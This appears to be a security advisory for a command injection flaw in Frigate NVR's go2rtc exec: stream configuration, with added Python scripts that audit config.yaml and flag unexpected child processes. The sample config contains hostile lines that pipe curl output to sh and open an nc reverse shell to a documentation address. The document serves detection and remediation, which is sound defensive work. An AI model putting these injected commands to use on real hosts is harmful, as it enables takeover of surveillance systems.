CVE-2026-25643
Frigate · Frigate NVR
Critical RCE in Frigate NVR: unsanitized input in the go2rtc video stream configuration allows command injection through the exec: directive.
Executive summary
A critical command injection vulnerability in Frigate NVR allows an authenticated administrator, or an unauthenticated remote attacker when the instance is reachable without an authentication layer, to execute arbitrary system commands through the go2rtc integration.
Vulnerability
This vulnerability is a Remote Command Execution (RCE) flaw in the integration between Frigate and go2rtc. Frigate does not sanitize the go2rtc stream configuration it takes from config.yaml, so a stream source written with go2rtc's exec: directive is executed as a system command. Anyone who can change that configuration can therefore run arbitrary commands on the host: an authenticated administrator, or an unauthenticated attacker if the instance is exposed to the internet without an authentication layer in front of it.
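To make the injection point concrete, and to support the configuration review recommended under Remediation, here is an added audit script (not code from the advisory, from Frigate or from go2rtc) that scans a Frigate config.yaml for exec: stream sources under the top-level go2rtc: block. The sample configuration is constructed for the example, the rtsp and curl targets are documentation addresses, and the allowlist of expected binaries (only ffmpeg) and the shell-metacharacter heuristic are assumptions to tune for your own deployment. The scanner is deliberately line based so it needs no YAML library.

```python
"""Audit a Frigate config.yaml for go2rtc `exec:` stream sources.

A go2rtc source that starts with `exec:` runs the rest of the string as a
command, so whoever can write the `go2rtc.streams` block of config.yaml can
run commands on the host. This scanner walks the file line by line, tracks
indentation to find the top-level `go2rtc:` key and its `streams:` child, and
reports every source value that begins with `exec:`.
"""
import re
from typing import List, Tuple

# Constructed sample (not from any real incident): one legitimate ffmpeg
# exec: source, one exec: source that launches a shell, and one ffmpeg source
# with a chained command appended.
SAMPLE_CONFIG = """\
mqtt:
  host: mqtt.local
go2rtc:
  streams:
    front_door:
      - rtsp://user:pass@192.0.2.10/stream1
      - exec:ffmpeg -rtsp_transport tcp -i rtsp://192.0.2.10/stream1 -c copy -f rtsp {output}
    backyard: "exec:bash -c 'curl http://203.0.113.5/x | sh'"
    garage:
      - exec:ffmpeg -i rtsp://192.0.2.11/s; nc 203.0.113.5 4444 -e /bin/sh
cameras:
  front_door:
    ffmpeg:
      inputs:
        - path: rtsp://127.0.0.1:8554/front_door
          roles: [detect]
"""

# Assumption: ffmpeg is the only binary you expect go2rtc to spawn.
ALLOWED_BINARIES = {"ffmpeg"}
# Assumption (heuristic): an ffmpeg command line never needs command chaining
# or substitution characters, so their presence is suspicious.
SHELL_META = re.compile(r"[;&|`$]")

Finding = Tuple[int, str, str]  # (line number, exec: source, verdict)


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" "))


def audit_go2rtc_exec(config_text: str) -> List[Finding]:
    """Return every exec: source under go2rtc.streams with a verdict."""
    findings: List[Finding] = []
    go2rtc_indent = None   # set while inside the top-level go2rtc: block
    streams_indent = None  # set while inside go2rtc.streams:
    for lineno, raw in enumerate(config_text.splitlines(), start=1):
        line = raw.split(" #", 1)[0].rstrip()  # drop trailing YAML comments
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        ind = _indent(line)
        key = line.strip()
        # A line indented at or above a block's key closes that block.
        if streams_indent is not None and ind <= streams_indent:
            streams_indent = None
        if go2rtc_indent is not None and ind <= go2rtc_indent:
            go2rtc_indent = None
        if go2rtc_indent is None:
            if ind == 0 and key == "go2rtc:":
                go2rtc_indent = 0
            continue
        if streams_indent is None:
            if key == "streams:":
                streams_indent = ind
            continue
        # Inside go2rtc.streams: any scalar beginning with exec: is a command.
        match = re.search(r"exec:(.*)$", line)
        if not match:
            continue
        command = match.group(1).strip()
        if command.endswith(('"', "'")):  # strip the closing YAML quote
            command = command[:-1]
        tokens = command.split()
        binary = tokens[0] if tokens else ""
        if binary not in ALLOWED_BINARIES:
            verdict = f"unexpected binary {binary!r}"
        elif SHELL_META.search(command):
            verdict = "shell metacharacters in command"
        else:
            verdict = "allowed"
        findings.append((lineno, "exec:" + command, verdict))
    return findings


if __name__ == "__main__":
    for lineno, source, verdict in audit_go2rtc_exec(SAMPLE_CONFIG):
        print(f"line {lineno}: {verdict}: {source}")
```

Every exec: source is listed, including the ones the allowlist accepts, because in an audit you want to confirm each one was put there on purpose; only the go2rtc.streams block is inspected, since that is where go2rtc interprets the directive.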
Business impact
A successful exploit gives the attacker code execution on the underlying host at the privilege level of the go2rtc service, which is enough to take control of the NVR and its recorded surveillance data and to use the host as a foothold for lateral movement within the network. The CVSS score of 9.1 reflects the critical nature of this flaw.
Remediation
Immediate Action: Update Frigate to version 0.16.4 or later, which fixes the unsanitized input, as soon as possible.
Proactive Monitoring: Review the go2rtc section of config.yaml for exec: stream sources that you did not add, and monitor for unusual process spawning from the Frigate or go2rtc services.
Compensating Controls: Do not expose the Frigate instance to the public internet without an authentication layer or VPN in front of it, and place a Web Application Firewall (WAF) in front of it to inspect requests that modify the configuration.
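For the process-monitoring item above, here is an added check (not code from the advisory or from the Frigate or go2rtc projects) that takes `ps -eo pid,ppid,comm` output, rebuilds the process tree, and reports every descendant of a go2rtc process that is not one of the children go2rtc is expected to spawn. The ps listing is constructed for the example, and the expected-child set (only ffmpeg) is an assumption to adjust for your deployment.

```python
"""Flag unexpected descendants of go2rtc in a `ps -eo pid,ppid,comm` listing.

A command injected through an exec: source typically shows up as a shell or
a network tool running under go2rtc, often one level below the expected
ffmpeg process. Walking the whole subtree catches both cases.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample listing: go2rtc with a legitimate ffmpeg child, plus an
# injected source whose sh wrapper has spawned nc.
SAMPLE_PS = """\
  PID  PPID COMMAND
    1     0 s6-svscan
  312     1 frigate
  320   312 go2rtc
  341   320 ffmpeg
  355   320 sh
  356   355 nc
  402   312 python3
"""

SERVICE_NAMES = {"go2rtc"}      # process names to treat as roots of the check
EXPECTED_CHILDREN = {"ffmpeg"}  # assumption: the only thing go2rtc should spawn

Row = Tuple[int, int, str]  # (pid, ppid, comm)


def parse_ps(text: str) -> List[Row]:
    """Parse `ps -eo pid,ppid,comm` output, skipping the header line."""
    rows: List[Row] = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            rows.append((int(parts[0]), int(parts[1]), parts[2]))
    return rows


def unexpected_descendants(rows: List[Row]) -> List[Tuple[int, str]]:
    """Return (pid, ancestry chain) for each suspicious process under a service."""
    children: Dict[int, List[Tuple[int, str]]] = defaultdict(list)
    for pid, ppid, comm in rows:
        children[ppid].append((pid, comm))
    flagged: List[Tuple[int, str]] = []
    stack = [(pid, [comm]) for pid, _, comm in rows if comm in SERVICE_NAMES]
    while stack:
        pid, chain = stack.pop()
        for child_pid, comm in children.get(pid, []):
            path = chain + [comm]
            if comm not in EXPECTED_CHILDREN:
                flagged.append((child_pid, " > ".join(path)))
            stack.append((child_pid, path))  # keep walking below expected children too
    return flagged


if __name__ == "__main__":
    for pid, chain in unexpected_descendants(parse_ps(SAMPLE_PS)):
        print(f"pid {pid}: {chain}")
```

Run it periodically on the host (or inside the Frigate container, where go2rtc actually runs) and alert on any output; a clean system returns nothing.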
Exploitation status
Public Exploit Available: false
Analyst recommendation
This RCE is as serious as it gets for organizations that rely on Frigate for physical security. Apply the 0.16.4 update immediately and audit all configuration files for signs of tampering.